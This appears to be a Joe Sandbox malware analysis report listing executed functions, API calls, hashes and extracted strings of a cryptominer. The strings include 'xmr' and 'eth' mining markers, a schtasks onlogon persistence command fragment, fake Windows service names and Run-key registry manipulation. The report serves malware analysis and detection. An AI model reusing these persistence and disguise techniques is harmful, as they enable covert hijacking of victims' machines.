Associated: 00000022.00000002.2119026622.00007FF6E1E6B000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000022.00000002.2119056656.00007FF6E1E6C000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000022.00000002.2119612459.00007FF6E23D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000022.00000002.2119650743.00007FF6E23D9000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000022.00000002.2119751267.00007FF6E23E2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000022.00000002.2119814333.00007FF6E23E5000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000022.00000002.2119847228.00007FF6E23E6000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ff6e1e50000_2448028260.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fc9e1e80a9e88cbd31d74ff9d33f509eac08cb26dec99584b05bafd3a36954d
Instruction ID: 1f249e16500546e0fbc6a3a5510d4db34b6bcd8a86443350ada04e68c747e84f
Opcode Fuzzy Hash: 2fc9e1e80a9e88cbd31d74ff9d33f509eac08cb26dec99584b05bafd3a36954d
Instruction Fuzzy Hash: 74B01232D1820AB4E3002F21D84135833617F24740F4044B0D40C43352CEBE50414F16

Analysis Process: powershell.exePID: 7872, Parent PID: 4056COMMON

Executed Functions

Function 00007FFAAC1DA1D5 Relevance: 3.1, Strings: 2, Instructions: 565COMMON

Download Yara Rule

Strings

`\%, xrefs: 00007FFAAC1DA2F9
^%, xrefs: 00007FFAAC1DA339

Memory Dump Source

Source File: 0000002E.00000002.2110339532.00007FFAAC1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC1D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_7ffaac1d0000_powershell.jbxd

Similarity

API ID:
String ID: `\%$^%
API String ID: 0-246816047
Opcode ID: b089ee67a4e6187b32420b7532ee9c346493a95f236a2d4fbe15a9706daeec8c
Instruction ID: 6e09491fc3393555d12a4003ef51bebae2e8bd79fe74d7161a373e29b4db1c5d
Opcode Fuzzy Hash: b089ee67a4e6187b32420b7532ee9c346493a95f236a2d4fbe15a9706daeec8c
Instruction Fuzzy Hash: 34C1E763A0E6C28FF717876858652A57FA0EF5322474C81F7D0CD9B0D3E919A90E83D2

Function 00007FFAAC1DAE48 Relevance: .3, Instructions: 251COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002E.00000002.2110339532.00007FFAAC1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC1D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_7ffaac1d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d11b39798a7f33ec6e95733e858d4a75896ef674b059b309c04d5527797c9ae
Instruction ID: 04adec9d0ebf34e8fd4f8d8d203e692919d80c8381b4fffea98d643dad52f4e2
Opcode Fuzzy Hash: 4d11b39798a7f33ec6e95733e858d4a75896ef674b059b309c04d5527797c9ae
Instruction Fuzzy Hash: 09113C3190E7C98FD7179B3848295957FB0AE63215B0941DBD489CB0F3DA289858C7A3

Function 00007FFAAC1DA0C5 Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002E.00000002.2110339532.00007FFAAC1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC1D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_7ffaac1d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a4d8b9bfee55e2037147889e6399157f202bf87a977b5b0299d1fa4bd846102
Instruction ID: f94b1c78b1761bf1e0d7fc8ae69fb40b444dbcbf3274231e0df977f2477bb157
Opcode Fuzzy Hash: 8a4d8b9bfee55e2037147889e6399157f202bf87a977b5b0299d1fa4bd846102
Instruction Fuzzy Hash: FD31263191CB488FDB19DB5CDC4A6A97BE0FB6A320F00426FE049D3252DA74A855CBC2

Function 00007FFAAC0BE620 Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002E.00000002.2109700701.00007FFAAC0BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC0BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_7ffaac0bd000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a86316a963fd82f8a1fe3a20c6533ba97a6950ade05208be7037962d5b6c3d3
Instruction ID: 5e989834887f3cbf9d45daf5a88a0f94957e929e7dd4eebe86a150fa043a282b
Opcode Fuzzy Hash: 3a86316a963fd82f8a1fe3a20c6533ba97a6950ade05208be7037962d5b6c3d3
Instruction Fuzzy Hash: 5F41147140EBC48FE756CB2898459523FF0EF57260B1905DFD098CB1A7D625EC4AC792

Function 00007FFAAC1DB1B8 Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002E.00000002.2110339532.00007FFAAC1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC1D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_7ffaac1d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8bd3e69655c0456fe9678c9a99048414d1af1884922c01563287b2e076fc9c75
Instruction ID: 7902aec42d31572a90a4a043e4c9240a09c6cfba7289336d9f473dd1ca0a3e04
Opcode Fuzzy Hash: 8bd3e69655c0456fe9678c9a99048414d1af1884922c01563287b2e076fc9c75
Instruction Fuzzy Hash: BD21F83190CB4C8FEB59DB9C984A7E97BE0EB96321F04826BD449C3152DA74A41ACB91

Function 00007FFAAC1D4665 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002E.00000002.2110339532.00007FFAAC1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC1D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_7ffaac1d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9917f3665b61f1b4cf24688b0974a73972e94ae79d024ecab79b6f9db2d56c36
Instruction ID: e5ea910da58502742e63fb134cc493be00ff31ea9c177c6010e75e7f9239d5f8
Opcode Fuzzy Hash: 9917f3665b61f1b4cf24688b0974a73972e94ae79d024ecab79b6f9db2d56c36
Instruction Fuzzy Hash: 7001677121CB0C8FDB44EF0CE451AA5B7E0FB99364F10056EE58AC3661DB36E882CB45

Function 00007FFAAC2A4A1D Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002E.00000002.2111096821.00007FFAAC2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC2A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_7ffaac2a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50f9dfcdc68f26cab6ba0cd248f678190d0bffce22ec1cd931a12eea3ee55504
Instruction ID: 7ce31029261309a83cef313336e5c806123187cc64f0db8676a0678cf1d3669e
Opcode Fuzzy Hash: 50f9dfcdc68f26cab6ba0cd248f678190d0bffce22ec1cd931a12eea3ee55504
Instruction Fuzzy Hash: FBF0BE32A0D9488FE758EB1CE4419A873E0EF46320B1050BAE15EC72A7CE35EC48C785

Function 00007FFAAC2A53E4 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002E.00000002.2111096821.00007FFAAC2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC2A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_7ffaac2a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1ea4887ee526584016a4c0a68f3b03f9884d77d2bd558a7a8d6fb10e85c7d48
Instruction ID: c4a1dfd8090adbda3536d7b3e31e55818dde2025bac7bb5d2499caedb40a130d
Opcode Fuzzy Hash: c1ea4887ee526584016a4c0a68f3b03f9884d77d2bd558a7a8d6fb10e85c7d48
Instruction Fuzzy Hash: A3F0373171CF044FD744EE2DD445665B7D1FBA8355F10452FE449C3651DA25E4818786

Function 00007FFAAC2A4CD0 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002E.00000002.2111096821.00007FFAAC2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC2A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_7ffaac2a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1981433965b9fb8179f9446eedce46e3909f75026771835588938e24e313a729
Instruction ID: 58c35a2e63cab2a50d466bc6cb8bddab9601c8f109de311628dc754e1a9851a8
Opcode Fuzzy Hash: 1981433965b9fb8179f9446eedce46e3909f75026771835588938e24e313a729
Instruction Fuzzy Hash: 94F08236A0DA488FE759FB5CE4418A877E0FF4632071550B6E14EC7567DA26EC58C780

Analysis Process: winupsecvmgr.exePID: 6256, Parent PID: 932COMMON

Executed Functions

Function 00007FF75CFC14B0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000033.00000002.2319554932.00007FF75CFC1000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FF75CFC0000, based on PE: true

Associated: 00000033.00000002.2319492281.00007FF75CFC0000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000033.00000002.2319595860.00007FF75CFDB000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000033.00000002.2321337510.00007FF75D549000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000033.00000002.2321361349.00007FF75D552000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000033.00000002.2321384352.00007FF75D555000.00000008.00000001.01000000.00000014.sdmpDownload File
Associated: 00000033.00000002.2321407010.00007FF75D556000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_51_2_7ff75cfc0000_winupsecvmgr.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fc9e1e80a9e88cbd31d74ff9d33f509eac08cb26dec99584b05bafd3a36954d
Instruction ID: 0f62dec1fb8d6d27b12cb941f1a6e4254e7f59cec47c5e77ee19386f462c8dbb
Opcode Fuzzy Hash: 2fc9e1e80a9e88cbd31d74ff9d33f509eac08cb26dec99584b05bafd3a36954d
Instruction Fuzzy Hash: 7AB01232E0C30998F3007F21D84136872206B44740FD69430C80C03392DE7CD0504731

Analysis Process: 193938922.exePID: 8148, Parent PID: 7404COMMON

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00007FFAAC190685 Relevance: 1.6, APIs: 1, Instructions: 128
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtQuerySystemInformation.NTDLL ref: 00007FFAAC190FD1

Memory Dump Source

Source File: 00000035.00000002.2215910561.00007FFAAC190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_53_2_7ffaac190000_193938922.jbxd

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: bbe92b99177085835091593047c44d69403bcfe5b1ecdf128037bbcc91c03929
Instruction ID: 45e9ead97277bf242779e8244571de6fbdc3abc686afbbdd09f6b1586065f244
Opcode Fuzzy Hash: bbe92b99177085835091593047c44d69403bcfe5b1ecdf128037bbcc91c03929
Instruction Fuzzy Hash: 9C313771A0CA4C8FE718DB9CE8499F9BBE5EF99321F10423FD049C3152DB7168468781

Function 00007FFAAC190F11 Relevance: 1.6, APIs: 1, Instructions: 126
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtQuerySystemInformation.NTDLL ref: 00007FFAAC190FD1

Memory Dump Source

Source File: 00000035.00000002.2215910561.00007FFAAC190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_53_2_7ffaac190000_193938922.jbxd

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: 3ee0f8dab1ed87f9d2c12a5c7f490885dd306707b67dfe5bab37413df0689358
Instruction ID: 8acafcd41540895986ff01d92b345c846aac973bc0fa6af9d08c6967826459b3
Opcode Fuzzy Hash: 3ee0f8dab1ed87f9d2c12a5c7f490885dd306707b67dfe5bab37413df0689358
Instruction Fuzzy Hash: ED31E57090CB4C8FDB18DFA8D845AF9BBE1EF5A325F00426FD04AC3652DB656856CB81

Function 00007FFAAC190690 Relevance: 1.6, APIs: 1, Instructions: 118
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtQuerySystemInformation.NTDLL ref: 00007FFAAC190FD1

Memory Dump Source

Source File: 00000035.00000002.2215910561.00007FFAAC190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_53_2_7ffaac190000_193938922.jbxd

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: 106fbd3adf114099ee0036bc9d07da0f758d774a7cb25bb2bdc803a10bc00c6a
Instruction ID: b9f23dce161ac339969d29bcd8aeed29b56f980f0de9b490bac7e45217a6164c
Opcode Fuzzy Hash: 106fbd3adf114099ee0036bc9d07da0f758d774a7cb25bb2bdc803a10bc00c6a
Instruction Fuzzy Hash: 3F31067190CA4C8FDB18DB9CE849AF9BBE5EB59325F10423FD00AD3252DF7168468781

Analysis Process: 236013504.exePID: 8016, Parent PID: 7404COMMON

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00F410A0 Relevance: 36.8, APIs: 8, Strings: 13, Instructions: 78
registrysleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(000007D0), ref: 00F410AB

Part of subcall function 00F41000: ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 00F4101A
Part of subcall function 00F41000: wsprintfW.USER32 ref: 00F41033
Part of subcall function 00F41000: PathFileExistsW.KERNELBASE(?), ref: 00F41043

RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run\,00000000,00020006,?), ref: 00F41123
RegDeleteValueW.ADVAPI32(?,Microsoft Windows Service), ref: 00F41151
RegCloseKey.ADVAPI32(?), ref: 00F4115D
Sleep.KERNEL32(000007D0), ref: 00F41168
RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Run\,00000000,00020006,?), ref: 00F41183
RegDeleteValueW.ADVAPI32(?,Microsoft Windows Service), ref: 00F411B1
RegCloseKey.ADVAPI32(?), ref: 00F411BD

Strings

Windows Update 46363463464, xrefs: 00F410DB
Microsoft Windows Driver, xrefs: 00F410C6
Windows Update 75849348, xrefs: 00F410D4
Windows Upgrade Manager, xrefs: 00F410F0
Host Process for Windows Services, xrefs: 00F410CD
Windows Operating System, xrefs: 00F410F7
Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 00F41119
Microsoft Windows Update Service, xrefs: 00F410BF
Microsoft Windows Service, xrefs: 00F410B1, 00F4114C, 00F411AC
Microsoft Windows Services, xrefs: 00F410B8
Windows Update 4950505060, xrefs: 00F410E2
Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 00F41179
Windows Upgrade 40885040, xrefs: 00F410E9

Memory Dump Source

Source File: 0000003E.00000002.2283028204.0000000000F41000.00000020.00000001.01000000.00000016.sdmp, Offset: 00F40000, based on PE: true

Associated: 0000003E.00000002.2283008060.0000000000F40000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000003E.00000002.2283046559.0000000000F42000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000003E.00000002.2283066230.0000000000F43000.00000008.00000001.01000000.00000016.sdmpDownload File
Associated: 0000003E.00000002.2283084945.0000000000F44000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000003E.00000002.2283104407.0000000000F45000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_62_2_f40000_236013504.jbxd

Similarity

API ID: CloseDeleteOpenSleepValue$EnvironmentExistsExpandFilePathStringswsprintf
String ID: Host Process for Windows Services$Microsoft Windows Driver$Microsoft Windows Service$Microsoft Windows Services$Microsoft Windows Update Service$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Windows Operating System$Windows Update 46363463464$Windows Update 4950505060$Windows Update 75849348$Windows Upgrade 40885040$Windows Upgrade Manager
API String ID: 2575504554-1382139348
Opcode ID: 09652fe007bec9f9ab35c09608dda0f01920a70f25e0a8bbb661e790547112c1
Instruction ID: 30e17f141306fd63e7767801908134b00cf460228b3072a8ea418b186c79f418
Opcode Fuzzy Hash: 09652fe007bec9f9ab35c09608dda0f01920a70f25e0a8bbb661e790547112c1
Instruction Fuzzy Hash: 45314870911208ABDB44DFD4ED88BADBFB9FF44309FA04028FE016A246D7B45584EB54

Function 00F41000 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 41
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 00F4101A
wsprintfW.USER32 ref: 00F41033
PathFileExistsW.KERNELBASE(?), ref: 00F41043
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000002,00000000), ref: 00F41069
CloseHandle.KERNEL32(000000FF), ref: 00F41085

Strings

%temp%, xrefs: 00F41015
%s\dd55ddff6fd.txt, xrefs: 00F41027

Memory Dump Source

Source File: 0000003E.00000002.2283028204.0000000000F41000.00000020.00000001.01000000.00000016.sdmp, Offset: 00F40000, based on PE: true

Associated: 0000003E.00000002.2283008060.0000000000F40000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000003E.00000002.2283046559.0000000000F42000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000003E.00000002.2283066230.0000000000F43000.00000008.00000001.01000000.00000016.sdmpDownload File
Associated: 0000003E.00000002.2283084945.0000000000F44000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000003E.00000002.2283104407.0000000000F45000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_62_2_f40000_236013504.jbxd

Similarity

API ID: File$CloseCreateEnvironmentExistsExpandHandlePathStringswsprintf
String ID: %s\dd55ddff6fd.txt$%temp%
API String ID: 750032643-2034341319
Opcode ID: 65aa12fbaedea5a5d96a264966405f14c7ba610d5903848011a0412ceda36b4d
Instruction ID: 98cf9a87b647804d08ad566c45da3da075d19704a01d591f66b71fa780d102ad
Opcode Fuzzy Hash: 65aa12fbaedea5a5d96a264966405f14c7ba610d5903848011a0412ceda36b4d
Instruction Fuzzy Hash: B80184B894030CABD7609B649C4AFE57778AB45700F4042A4BE19960D1DBB05AC4EFB5

Analysis Process: conhost.exePID: 5064, Parent PID: 4056COMMON

Executed Functions

Function 00007FF6B6F185C0 Relevance: 55.0, APIs: 15, Strings: 21, Instructions: 1045
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wcslen.MSVCRT ref: 00007FF6B6F1871A
memset.MSVCRT ref: 00007FF6B6F188B2
memset.MSVCRT ref: 00007FF6B6F18A35
memset.MSVCRT ref: 00007FF6B6F18AFE
memset.MSVCRT ref: 00007FF6B6F18C9D
memset.MSVCRT ref: 00007FF6B6F18F0E
memset.MSVCRT ref: 00007FF6B6F190B7
memset.MSVCRT ref: 00007FF6B6F19187
_wcsicmp.MSVCRT ref: 00007FF6B6F19515
memcpy.MSVCRT ref: 00007FF6B6F1956C
memcpy.MSVCRT ref: 00007FF6B6F19590
memcpy.MSVCRT ref: 00007FF6B6F19835
memcpy.MSVCRT ref: 00007FF6B6F1985F
memcpy.MSVCRT ref: 00007FF6B6F19A38
memcpy.MSVCRT ref: 00007FF6B6F19A60

Strings

\Google\Libs\, xrefs: 00007FF6B6F18F48, 00007FF6B6F1908A
e; }, xrefs: 00007FF6B6F19A94
xmr, xrefs: 00007FF6B6F19438
\reg.exe, xrefs: 00007FF6B6F190E4, 00007FF6B6F1915B
\BaseNamedObjects\vljmdnomkxppwbqz, xrefs: 00007FF6B6F192FB
\BaseNamedObjects\dzemvzqxamm, xrefs: 00007FF6B6F18631
SYSTEMROOT=, xrefs: 00007FF6B6F18965
\cmd.exe, xrefs: 00007FF6B6F18A5B, 00007FF6B6F18AD2
\schtasks.exe, xrefs: 00007FF6B6F191C1, 00007FF6B6F19263
\System32, xrefs: 00007FF6B6F188DD, 00007FF6B6F18A13
5RK\E, xrefs: 00007FF6B6F18F13
APPDATA=, xrefs: 00007FF6B6F19007
eth, xrefs: 00007FF6B6F19427
0, xrefs: 00007FF6B6F1884A
%S /run /tn "Microsoft Windows Security", xrefs: 00007FF6B6F1945F
USERPROFILE=, xrefs: 00007FF6B6F18E32
\Microsoft Windows Security\winupsecvmgr.exe, xrefs: 00007FF6B6F18D19, 00007FF6B6F18EEC
\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft Windows Security, xrefs: 00007FF6B6F1984B, 00007FF6B6F19884, 00007FF6B6F19A08
\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00007FF6B6F18B70, 00007FF6B6F18C74
%S <#ydcfdz#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest , xrefs: 00007FF6B6F19A49, 00007FF6B6F19A81, 00007FF6B6F19AEC
\BaseNamedObjects\dzemvzqxamm, xrefs: 00007FF6B6F18726

Memory Dump Source

Source File: 0000003F.00000002.2633236426.00007FF6B6F01000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6B6F00000, based on PE: true

Associated: 0000003F.00000002.2633149399.00007FF6B6F00000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003F.00000002.2633344040.00007FF6B6F1A000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003F.00000002.2634118403.00007FF6B6F1C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003F.00000002.2634864571.00007FF6B6F23000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003F.00000002.2634864571.00007FF6B6F25000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003F.00000002.2635020938.00007FF6B6F28000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_63_2_7ff6b6f00000_conhost.jbxd

Similarity

API ID: memset$memcpy$_wcsicmpwcslen
String ID: %S /run /tn "Microsoft Windows Security"$%S <#ydcfdz#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest $0$5RK\E$APPDATA=$SYSTEMROOT=$USERPROFILE=$\BaseNamedObjects\dzemvzqxamm$\BaseNamedObjects\dzemvzqxamm$\BaseNamedObjects\vljmdnomkxppwbqz$\Google\Libs\$\Microsoft Windows Security\winupsecvmgr.exe$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft Windows Security$\System32$\WindowsPowerShell\v1.0\powershell.exe$\cmd.exe$\reg.exe$\schtasks.exe$e; }$eth$xmr
API String ID: 1321921031-4262344814
Opcode ID: 2e1c1d34a24cbe38c32c3fc8598f4389799938dfa055740cadfb5a8dc442976e
Instruction ID: 6021ce55817838d2b65e4e814299d7064624a97aeb8e0d20e54ecdf91fa51cfc
Opcode Fuzzy Hash: 2e1c1d34a24cbe38c32c3fc8598f4389799938dfa055740cadfb5a8dc442976e
Instruction Fuzzy Hash: D2D2A7A2C1C6CA95F7129B2DA4423F1B76ABF523C2F045271EB8C93665DF2FA145CB04

Function 00007FF6B6F01180 Relevance: 12.2, APIs: 8, Instructions: 195
sleepstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32 ref: 00007FF6B6F011E1
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF6B6F01253
malloc.MSVCRT ref: 00007FF6B6F01307
strlen.MSVCRT ref: 00007FF6B6F01329
malloc.MSVCRT ref: 00007FF6B6F01335
memcpy.MSVCRT ref: 00007FF6B6F01349
GetStartupInfoA.KERNEL32 ref: 00007FF6B6F01453

Memory Dump Source

Source File: 0000003F.00000002.2633236426.00007FF6B6F01000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6B6F00000, based on PE: true

Associated: 0000003F.00000002.2633149399.00007FF6B6F00000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003F.00000002.2633344040.00007FF6B6F1A000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003F.00000002.2634118403.00007FF6B6F1C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003F.00000002.2634864571.00007FF6B6F23000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003F.00000002.2634864571.00007FF6B6F25000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003F.00000002.2635020938.00007FF6B6F28000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_63_2_7ff6b6f00000_conhost.jbxd

Similarity

API ID: malloc$ExceptionFilterInfoSleepStartupUnhandledmemcpystrlen
String ID:
API String ID: 649803965-0
Opcode ID: bef71663f6727e431b96fe150fb6a14801079257b7d8a09b9d0d6fdac41f2695
Instruction ID: c59c579fca34e8bbf8bb2d551353bbf2c27743af4b2fdaae80220ff714aa6fc3
Opcode Fuzzy Hash: bef71663f6727e431b96fe150fb6a14801079257b7d8a09b9d0d6fdac41f2695
Instruction Fuzzy Hash: F38179B6E0965E85FA20DF9DE45177923ABBF0678AF4440B5DB0DC7391DE2EA8008700

Function 00007FF6B6F01720 Relevance: 31.8, APIs: 10, Strings: 8, Instructions: 341
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wcsncmp.MSVCRT ref: 00007FF6B6F0191D
memset.MSVCRT ref: 00007FF6B6F019F0

Strings

X, xrefs: 00007FF6B6F01CB1
%S /run /tn "Microsoft Windows Security", xrefs: 00007FF6B6F01724
xmr, xrefs: 00007FF6B6F01722
explorer.exe, xrefs: 00007FF6B6F01916
`, xrefs: 00007FF6B6F01C77
\??\, xrefs: 00007FF6B6F01A9F
0, xrefs: 00007FF6B6F01963
%S <#ydcfdz#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest , xrefs: 00007FF6B6F01726

Memory Dump Source

Source File: 0000003F.00000002.2633236426.00007FF6B6F01000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6B6F00000, based on PE: true

Associated: 0000003F.00000002.2633149399.00007FF6B6F00000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003F.00000002.2633344040.00007FF6B6F1A000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003F.00000002.2634118403.00007FF6B6F1C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003F.00000002.2634864571.00007FF6B6F23000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003F.00000002.2634864571.00007FF6B6F25000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003F.00000002.2635020938.00007FF6B6F28000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_63_2_7ff6b6f00000_conhost.jbxd

Similarity

API ID: memsetwcsncmp
String ID: %S /run /tn "Microsoft Windows Security"$%S <#ydcfdz#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest $0$X$\??\$`$explorer.exe$xmr
API String ID: 1181335886-2264807111
Opcode ID: f8cfd7b86f925d349d6709900d58b5fa3256a42d216d8e8759b2934d909081e9
Instruction ID: adae9d752e5e308fb79b89906d6eea36f1623daa16fda7d885da69c5d69a051d
Opcode Fuzzy Hash: f8cfd7b86f925d349d6709900d58b5fa3256a42d216d8e8759b2934d909081e9
Instruction Fuzzy Hash: 7B026F62918BC985E321CF29E4003AAB3AAFB85795F404375EB9C976D5DF3ED144CB00

Function 00007FF6B6F02990 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 50
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00007FF6B6F029BE

Part of subcall function 00007FF6B6F01720: wcsncmp.MSVCRT ref: 00007FF6B6F0191D

Strings

eth, xrefs: 00007FF6B6F02999
\BaseNamedObjects\vljmdnomkxppwbqz, xrefs: 00007FF6B6F02997

Memory Dump Source

Source File: 0000003F.00000002.2633236426.00007FF6B6F01000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6B6F00000, based on PE: true

Associated: 0000003F.00000002.2633149399.00007FF6B6F00000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003F.00000002.2633344040.00007FF6B6F1A000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003F.00000002.2634118403.00007FF6B6F1C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003F.00000002.2634864571.00007FF6B6F23000.00000004.00000001.01000000.00000000.sdmpDownload File
